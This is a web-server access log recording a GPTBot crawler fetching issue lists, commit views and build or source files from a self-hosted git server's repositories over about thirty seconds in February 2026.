"https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:17:56:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:17:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10219] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" -[17/Feb/2026:17:56:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9828] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" -[17/Feb/2026:17:56:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:17:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 875] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:56:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/import%20sys.py" -[17/Feb/2026:17:56:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:56:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:17:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:17:56:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11271] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:56:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:17:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:17:56:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11119] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:17:56:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json?display=source" [Client 74.7.227.38] [Length 12947] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" -[17/Feb/2026:17:56:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=all&type=all" -[17/Feb/2026:17:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:56:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11004] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:17:56:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11051] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" -[17/Feb/2026:17:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11715] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" -[17/Feb/2026:17:56:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11286] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/metadata.json" -[17/Feb/2026:17:56:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11061] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" -[17/Feb/2026:17:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11687] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:17:56:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11867] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" -[17/Feb/2026:17:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11716] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" -[17/Feb/2026:17:56:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" -[17/Feb/2026:17:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11715] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" -[17/Feb/2026:17:56:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10121] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:17:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9954] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:17:56:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21735] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:56:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:17:56:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10101] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py?display=source" [Client 74.7.227.38] [Length 30396] [Gzip 8.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:17:57:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fGoldMonitor_V5.3.pkg" [Client 74.7.227.38] [Length 23790] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -[17/Feb/2026:17:57:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fGoldMonitor_V5.1.pkg" [Client 74.7.227.38] [Length 23803] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -[17/Feb/2026:17:57:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fGoldMonitor_V5.2.pkg" [Client 74.7.227.38] [Length 23802] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -[17/Feb/2026:17:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:57:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" -[17/Feb/2026:17:57:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9935] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:17:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:17:57:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9959] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:17:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:17:57:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10127] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10144] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" -[17/Feb/2026:17:57:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12031] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" -[17/Feb/2026:17:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr 